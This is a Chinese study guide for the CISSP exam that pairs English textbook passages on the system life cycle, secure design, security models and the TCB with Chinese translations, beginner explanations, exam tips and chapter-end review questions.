教材原文段落

Development/Implementation This phase is where the actual coding and development of the information system take place. Developers work on creating the software, configuring hardware, and integrating various components to bring the system to life. Integration This phase is the process of combining different modules or components of the system to ensure they work together seamlessly. The goal here is to ensure that the individual elements of the system function as a unified whole. Verification and Validation This phase is focused on confirming that the developed system meets the specified requirements.

Verification ensures that each component of the system is correctly implemented, whereas validation ensures that the system as a whole fulfills its intended purpose. Transition/Deployment This phase is when the system is deployed for actual use. Transition involves the migration of the system from the development environment to the operational environment, making it available to end users. Operations and Maintenance/Sustainment In this phase, the system is actively used in the operational environment.

Operations involve day-to-day management, monitoring, and support, while maintenance ensures that the system continues to function correctly by addressing issues, applying updates, and making improvements. Sustainment refers to the ongoing focus on maintaining and supporting the operational functionality of an information system over an extended period. Retirement/Disposal Eventually, the information system reaches the end of its life cycle. The retirement or disposal phase involves decommissioning the system in an organized manner, considering data disposal, ensuring compliance with regulations, and making decisions about the future of the system or its replacement.

Effectively managing the information system life cycle requires collaboration among different stakeholders, adherence to best practices, and continuous improvement to meet evolving needs and technological advancements. Summary

中文直译 / 整理

开发/实施 此阶段是信息系统实际编码和开发的地方。 开发人员致力于 创建软件、配置硬件并集成各种组件,以使系统得以实现。 集成 此阶段是将系统的不同模块或组件组合在一起,以确保它们无缝协作 的过程。 目标是确保系统的各个元素作为一个统一的整体正常运行。 验证与确认 此阶段侧重于确认开发的系统是否符合规定的要求。 验证确保系 统的每个组件都正确实现,而确认则确保整个系统实现了其预期目的。 过渡/部署 此阶段是系统投入实际使用的时候。 过渡涉及将系统从开发环境 迁移到运行环境,使其可供最终用户使用。 运行与维护/持续支持 在此阶段,系统在运行环境中被积极使用。 运行涉及 日常管理、监控和支持,而维护则通过解决问题、应用更新和进行改进, 确保系统持续正常运行。 持续支持是指长期致力于维护和支持信息系统的 运行功能。 退役/处置 最终,信息系统将达到其生命周期的终点。 退役或处置阶段涉 及以有组织的方式停用系统,考虑数据处置、确保符合法规,并对系统的 未来或其替代方案做出决策。 有效管理信息系统生命周期需要不同利益相关方之间的协作、遵循最佳实践, 以及持续改进以满足不断变化的需求和技术进步。 摘要

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 48 / PDF P534

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

Secure systems are not just assembled; they are designed to support security. Systems that must be secure are judged for their ability to support and enforce the security policy. Programmers should strive to build security into every application they develop, with greater levels of security provided to critical applications and those that process sensitive information.

There are numerous issues related to the establishment and integration of security into a product, including managing subjects and objects and their relationships, using open or closed systems, managing secure defaults, designing a system to fail securely, abiding by the “keep it simple” postulate, implementing zero trust (instead of trust but verify), incorporating privacy by design, and using Secure Access Service Edge (SASE). CIA can be protected using confinement, bounds, and isolation. Access controls are used to implement security protections.

Proper security concepts, controls, and mechanisms must be integrated before and during the design and architectural period to produce a reliably secure product. A trusted system is one in which all protection mechanisms work together to process sensitive data for many types of users while maintaining a stable and secure computing environment. In other words, trust is the presence of a security mechanism or capability. Assurance is the degree of confidence in the satisfaction of security needs. In other words, assurance is how reliable the security mechanisms are at providing security.

When security systems are designed, it is often helpful to derive security mechanisms from standard security models. Some of the security models that should be recognized include the trusted computing base, state machine model, information flow model, noninterference model, take-grant model, access control matrix, Bell–LaPadula model, Biba model, Clark–Wilson model, and the Brewer and Nash model. Several security criteria exist for evaluating computer security systems. The Common Criteria uses a subjective system to meet security needs and a standard evaluation assurance level (EAL) to evaluate reliability.

The NIST Risk Management Framework (RMF) establishes an authorization to operate (ATO) issued by an authorizing official (AO) to ensure that only systems with acceptable risk levels are used to perform IT operations. It is important to carefully assess each aspect of the infrastructure to ensure that it sufficiently supports security. Without an understanding of the security capabilities of information systems, it is impossible to evaluate them, nor is it possible to implement them properly. The security capabilities of

中文直译 / 整理

安全的系统并非仅仅是组装而成; 它们是为支持安全性而设计的。 必须安全的 系统会因其支持和执行安全策略的能力而受到评估。 程序员应努力在他们开发 的每个应用程序中融入安全性,并为关键应用程序以及处理敏感信息的应用程 序提供更高水平的安全性。 在将安全集成到产品中时,存在诸多问题,包括管理主体与对象及其关系、使 用开放或封闭系统、管理安全默认值、设计系统以安全失败、遵守“保持简单” 原则、实现零信任(而非信任但验证)、融入隐私设计原则,以及使用安全访 问服务边缘(SASE)。 CIA 可通过限制、边界和隔离加以保护。 访问控制用于 实施安全保护。 必须在设计和架构阶段之前及期间整合适当的安全概念、控制措施和机制, 以生产出可靠安全的产品。 可信系统是指所有保护机制协同工作,为多种类 型的用户处理敏感数据,同时维持稳定且安全的计算环境。 换句话说,信任 即安全机制或能力的存在。 保障则是对安全需求得到满足的可信程度。 换句 话说,保障衡量的是安全机制提供安全性的可靠性。 在设计安全系统时,通常有助于从标准安全模型中推导出安全机制。

应识别的 一些安全模型包括:可信计算基、状态机模型、信息流模型、非干扰模型、取‑ 授权模型、访问控制矩阵、Bell‑LaPadula 模型、Biba 模型、Clark‑ Wilson 模型以及 Brewer 和 Nash 模型。 评估计算机安全系统存在若干安全标准。 通用准则采用主观系统来满足安全 需求,并使用标准评估保障等级(EAL)来评估可靠性。 NIST 风险管理框架(RMF)建立了由授权官员(AO)签发的运营授权( ATO),以确保仅允许风险水平可接受的系统用于执行 IT 操作。 仔细评估基础设施的每个方面以确保其充分支持安全性至关重要。 如果没有对 信息系统的安全能力的理解,就无法对其进行评估,也无法正确实施。 安全能 力包括

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 49 / PDF P535

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

information systems include memory protection, virtualization, Trusted Platform Module (TPM), encryption/decryption, interfaces, and fault tolerance. Managing the information system life cycle is a comprehensive process that involves various stages of a structured and organized approach to developing, deploying, and maintaining an information system. Study Essentials Be able to describe open and closed systems. Open systems are designed using industry standards and are usually easy to integrate with other open systems. Closed systems are generally proprietary hardware and/or software.

Their specifications are not normally published, and they are usually harder to integrate with other systems. Know about secure defaults. Never assume the default settings of any product are secure. It is always up to the system administrator and/or company security staff to alter a product's settings to comply with the organization's security policies. Understand the concept of fail securely. Failure management includes programmatic error handling (aka exception handling) and input sanitization; secure failure is integrated into the system (fail-safe versus fail-secure).

Know about the principle of “keep it simple.” “Keep it simple” is the encouragement to avoid overcomplicating the environment, organization, or product design. The more complex a system, the more difficult it is to secure. Understand zero trust. Zero trust is a security concept where nothing inside the organization is automatically trusted. Each request for activity or access is assumed to be from an unknown and untrusted location until otherwise verified. The concept is “never trust, always verify.” The zero-trust model is based around “assume breach” and microsegmentation. Know about privacy by design.

Privacy by design (PbD) is a guideline to integrate privacy protections into products during the early design phase rather than attempting to tack them on at the end of development. The PbD framework is based on seven foundational principles. Understand trust and assurance. A trusted system is one in which all protection mechanisms work together to process sensitive data for many types of users while maintaining a stable and secure computing environment.

中文直译 / 整理

信息系统的内存保护、虚拟化、可信平台模块(TPM)、加密/解密、接 口和容错能力。 管理信息系统生命周期是一个综合性的过程,涉及采用结构化和有组织的方法 来开发、部署和维护信息系统的各个阶段。 学习要点 能够描述开放系统和封闭系统。 开放系统采用行业标准设计,通常易于与其他开 放系统集成。 封闭系统通常是专有的硬件和/或软件,其规范通常不公开,且通常 更难与其他系统集成。 了解安全默认设置。 绝不要假设任何产品的默认设置是安全的。 系统管理员和/ 或公司安全人员必须更改产品的设置,以符合组织的安全策略。 理解“安全失效”的概念。 失效管理包括程序化错误处理(即异常处理)和输入 清理; 安全失效被集成到系统中(安全失效与失效安全)。 了解“保持简单”原则。 “保持简单”鼓励避免使环境、组织或产品设计过于 复杂。 系统越复杂,就越难保障其安全性。 理解零信任。 零信任是一种安全概念,其中组织内部的任何内容都不会被自动 信任。 每个活动或访问请求都被视为来自未知且不可信的地点,直到经过验证 为止。 该概念是“永不信任,始终验证”。 零信任模型围绕“假设已被入侵” 和微分段构建。 了解隐私设计。

隐私设计(PbD)是一种指导原则,旨在在产品开发的早期设计 阶段就集成隐私保护措施,而不是在开发末尾才附加这些措施。 PbD框架基于七 个基本原理。 理解信任与保障。 可信系统是指所有保护机制协同工作,为多种类型的用户处 理敏感数据,同时维持一个稳定且安全的计算环境。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

指南:指南是建议做法,不一定强制。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

Recommended、not compulsory 常对应 guideline。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
指南 指南是建议做法,不一定强制。
程序 程序是一步一步怎么做。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
学习单元 50 / PDF P536

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

In other words, trust is the presence of a security mechanism or capability. Assurance is the degree of confidence in the satisfaction of security needs. In other words, assurance is how reliable the security mechanisms are at providing security. Define a trusted computing base (TCB). A TCB is the combination of hardware, software, and controls that form a trusted base that enforces the security policy. Know details about each of the security models. The state machine model ensures that all instances of subjects accessing objects are secure. The information flow model is designed to prevent unauthorized, insecure, or restricted information flow.

The noninterference model prevents the actions of one subject from affecting the system state or actions of another subject. The take-grant model dictates how rights can be passed from one subject to another or from a subject to an object. An access control matrix is a table of subjects and objects that indicates the actions or functions that each subject can perform on each object. Bell–LaPadula subjects have a clearance level that allows them to access only those objects with the corresponding classification levels, which protects confidentiality. Biba prevents subjects with lower security levels from writing to objects at higher security levels.

Clark–Wilson is an integrity model that relies on the access control triplet (subject/program/object). Know the controls used for evaluating computer security systems. The Common Criteria (ISO/IEC 15408) is a subjective security function evaluation tool that uses protection profiles (PPs) and security targets (STs) and assigns an evaluation assurance level (EAL). Authorization to operate (ATO) (from the RMF) is a formal approval to operate IT/IS based on an acceptable risk level based on the implementation of an agreed-on set of security and privacy controls. Understand the security capabilities of information systems.

Common security capabilities include memory protection, virtualization, Trusted Platform Module (TPM), encryption/decryption, interfaces, and fault tolerance. Know about the information system life cycle. Managing the information system life cycle is a comprehensive process that involves various stages, each with specific activities and considerations. Managing the information system life cycle involves a structured and organized approach to

中文直译 / 整理

换句话说,信任是指存在安全机制或能力; 保障则是对安全需求得到满足的信 心程度。 换句话说,保障是指安全机制提供安全性时的可靠性。 定义可信计算基(TCB)。 TCB 是由硬件、软件和控制措施组成的可信基础, 用于强制执行安全策略。 了解每种安全模型的详细信息。 状态机模型确保所有主体访问对象的实例都是 安全的。 信息流模型旨在防止未经授权、不安全或受限的信息流动。 非干扰模型 防止一个主体的行为影响另一个主体的系统状态或行为。 取‑授权模型规定了权 利如何从一个主体传递给另一个主体,或从主体传递给对象。 访问控制矩阵是一 个主体和对象的表格,标明每个主体对每个对象可以执行的操作或功能。 Bell– LaPadula 主体具有一个权限级别,仅允许其访问具有相应分类级别的对象,从 而保护机密性。 Biba 模型防止低安全级别的主体向高安全级别的对象写入数据。 Clark–Wilson 是一种完整性模型,依赖于访问控制三元组(主体/程序/对象)。 了解用于评估计算机安全系统的控制措施。

共同准则(ISO/IEC 15408)是一 种主观的安全功能评估工具,使用保护轮廓(PPs)和安全目标(STs),并 分配评估保证级别(EAL)。 运行授权(ATO)(来自RMF)是基于已达成 一致的安全和隐私控制措施实施后所确定的可接受风险水平,对IT/IS系统正 式批准运行。 理解信息系统的安全能力。 常见的安全能力包括内存保护、虚拟化、可信平台 模块(TPM)、加密/解密、接口和容错。 了解信息系统生命周期。 管理信息系统生命周期是一个综合过程,涉及多个阶段, 每个阶段都有特定的活动和考虑因素。 管理信息系统生命周期需要采用结构化和 有组织的方法来

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

政府/军方场景看到 ATO,要关注文档、合规和现场审查。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
运行授权 ATO ATO 表示系统被授权在特定条件下运行。文档不足可能导致 ATO 丢失。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
学习单元 51 / PDF P537

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

developing, deploying, and maintaining an information system. Know the nine stages. Written Lab 1. Name at least seven security models and the primary security benefit of using each. 2. Describe the primary components of TCB. 3. What are the two primary rules or principles of the Bell–LaPadula security model? Also, what are the two rules of Biba? 4. What is the difference between open and closed systems and open and closed source? 5. Name at least four design principles and describe them. Review Questions 1. You have been working on crafting a new expansion service to link to the existing computing hardware of a core business function.

However, after weeks of research and experimentation, you are unable to get the systems to communicate. The CTO informs you that the computing hardware you are focusing on is a closed system. What is a closed system? A. A system designed around final, or closed, standards B. A system that includes industry standards C. A proprietary system that uses unpublished protocols D. Any machine that does not run Windows 2. A compromise of a newly installed Wi-Fi-connected baby monitor enabled an attacker to virtually invade a home and play scary sounds to a startled toddler. How was the attacker able to gain access to the baby monitor in this situation? A. Outdated malware scanners B.

A WAP supporting 5 GHz channels C. Performing a social engineering attack against the parents

中文直译 / 整理

开发、部署和维护信息系统。 了解九个阶段。 实验题 1. 至少列举七种安全模型,并说明使用每种模型的主要安全优势。 2. 描述TCB的主要组成部分。 3. Bell–LaPadula安全模型的两条主要规则或原则是什么? Biba模型的 两条规则又是什么? 4. 开放系统与封闭系统、开源与闭源之间的区别是什么? 5. 至少列举四种设计原则,并加以说明。 复习问题 1. 你一直在开发一项新的扩展服务,以连接核心业务功能的现有计算硬件。 然而,经过数周的研究和实验,你仍无法使系统实现通信。 CTO 告诉你,你 所关注的计算硬件是一个封闭系统。 什么是封闭系统? A. 一种围绕最终或封闭标准设计的系统 B. 一种包含行业标准的系统 C. 一种使用未公开协议的专有系统 D. 任何不运行 Windows 的机器 2. 一个新安装的Wi‑Fi连接婴儿监视器被攻破,使攻击者能够虚拟入侵家庭, 并向受惊的幼儿播放恐怖声音。 在这种情况下,攻击者是如何获得对婴儿监 视器的访问权限的? A. 过时的恶意软件扫描程序 B. 支持5 GHz信道的WAP C. 对父母实施社会工程攻击

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 52 / PDF P538

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

D. Exploiting default configuration 3. While working against a deadline, you are frantically trying to finish a report on the current state of security of the organization. You are pulling records and data items from over a dozen sources, including a locally hosted database, several documents, a few spreadsheets, and numerous web pages from an internal server. However, as you start to open another file from your hard drive, the system crashes and displays the Windows Blue Screen of Death. This event is formally known as a stop error and is an example of a(n) _______ approach to software failure. A. Fail-open B. Fail-secure C. Limit check D. Object-oriented 4.

As a software designer, you want to limit the actions of the program you are developing. You have considered using bounds and isolation but are not sure they perform the functions you need. Then, you realize that the limitation you want can be achieved using confinement. Which best describes a confined or constrained process? A. A process that can run only for a limited time B. A process that can run only during certain times of the day C. A process that can access only certain memory locations D. A process that controls access to an object 5. When a trusted subject violates the star property of Bell–LaPadula to write an object into a lower level, what valid operation could be taking place?

A. Perturbation B. Noninterference C. Aggregation D. Declassification 6. What security method, mechanism, or model reveals a capabilities list of a subject across multiple objects? A. Separation of duties D.

中文直译 / 整理

利用默认配置 3. 在截止日期前紧张地完成一份关于组织当前安全状态的报告时,你正从十 几个来源提取记录和数据项,包括本地托管的数据库、若干文档、几个电子 表格以及内部服务器上的大量网页。 然而,当你开始打开硬盘上的另一个文 件时,系统崩溃并显示了Windows蓝屏。 此事件正式称为停止错误,是软件 故障的一种_______ 方式示例。 A. 失效开放 B. 失效安全 C. 限制检查 D. 面向对象 4. 作为软件设计师,您希望限制正在开发的程序的行为。 您曾考虑使用边界 和隔离,但不确定它们是否能实现您所需的功能。 随后,您意识到您所需的 限制可以通过限制环境来实现。 以下哪一项最能描述受限或受约束的进程? A. 仅能运行有限时间的进程 B. 仅能在一天中特定时间段运行的进程 C. 仅能访问特定内存位置的进程 D. 控制对对象访问的进程 5. 当一个可信主体违反Bell–LaPadula模型的星属性,将对象写入较低安 全级别时,可能发生什么有效操作? A. 扰动 B. 非干扰 C. 聚合 D. 降级 6. 哪种安全方法、机制或模型可以揭示主体在多个对象上的能力列表? A. 职责分离

小白解释

场景先行:你是公司的安全负责人,正在读第 538 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
学习单元 53 / PDF P539

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

B. Access control matrix C. Biba D. Clark–Wilson 7. What security model has a feature that in theory has one name or label but, when implemented into a solution, takes on the name or label of the security kernel? A. Information flow model B. Biba model C. Trusted computing base D. Brewer and Nash model 8. The Clark–Wilson model uses a multifaceted approach to enforcing data integrity. Instead of defining a formal state machine, the Clark–Wilson model defines each data item and allowable data transformations. Which of the following is not part of the access control relationship of the Clark–Wilson model? A. Object B. Interface C. Input sanitization D. Subject 9.

While researching security models to base your new computer design around, you discover the concept of the TCB. What is a trusted computing base (TCB)? A. Hosts on your network that support secure transmissions B. The operating system kernel, other OS components, and device drivers C. The combination of hardware, software, and controls that work together to enforce a security policy D. The predetermined set or domain (i.e., a list) of objects that a subject can access 10. What is a security perimeter? (Choose all that apply.) A. The boundary of the physically secure area surrounding your system B.

中文直译 / 整理

访问控制矩阵 C. Biba D. Clark–Wilson 7. 哪种安全模型具有一个特性:理论上有一个名称或标签,但在实现为解决 方案时,会采用安全内核的名称或标签? A. 信息流模型 B. Biba 模型 C. 可信计算基 D. 布鲁尔和纳什模型 8. Clark–Wilson 模型采用多层面的方法来强制执行数据完整性。 与定义形 式化状态机不同,Clark–Wilson 模型定义了每个数据项及其允许的数据转 换。 以下哪一项不属于 Clark–Wilson 模型的访问控制关系? A. 对象 B. 接口 C. 输入清理 D. 主体 9. 在研究用于构建新计算机设计的安全模型时,您发现了TCB的概念。 什么是可信计算基(TCB)? A. 您网络中支持安全传输的主机 B. 操作系统内核、其他操作系统组件和设备驱动程序 C. 一起协同工作以执行安全策略的硬件、软件和控制措施的组合 D. 主体可以访问的预定义对象集或域(即列表) 10. 什么是安全边界? (可多选) A. 您的系统周围物理安全区域的边界

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

安全边界:安全边界是不同信任级别或安全要求交接的位置。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
安全边界 安全边界是不同信任级别或安全要求交接的位置。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 54 / PDF P540

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

B. The imaginary boundary that separates the TCB from the rest of the system C. The network where your firewall resides D. Any connections to your computer system 11. The trusted computing base (TCB) is a combination of hardware, software, and controls that work together to form a trusted base to enforce your security policy. What part of the TCB concept validates access to every resource prior to granting the requested access? A. TCB partition B. Trusted library C. Reference monitor D. Security kernel 12. A security model provides a way for designers to map abstract statements into a solution that prescribes the algorithms and data structures necessary to build hardware and software.

Thus, a security model gives software designers something against which to measure their design and implementation. Which of the following is the best definition of a security model? A. A security model states policies an organization must follow. B. A security model provides a framework to implement a security policy. C. A security model is a technical evaluation of each part of a computer system to assess its concordance with security standards. D. A security model is used to host one or more operating systems within the memory of a single host computer or to run applications that are not compatible with the host OS. 13.

The state machine model describes a system that is always secure no matter what state it is in. A secure state machine model system always boots into a secure state, maintains a secure state across all transitions, and allows subjects to access resources only in a secure manner compliant with the security policy. Which security models are built on a state machine model? A. Bell–LaPadula and take-grant B.

中文直译 / 整理

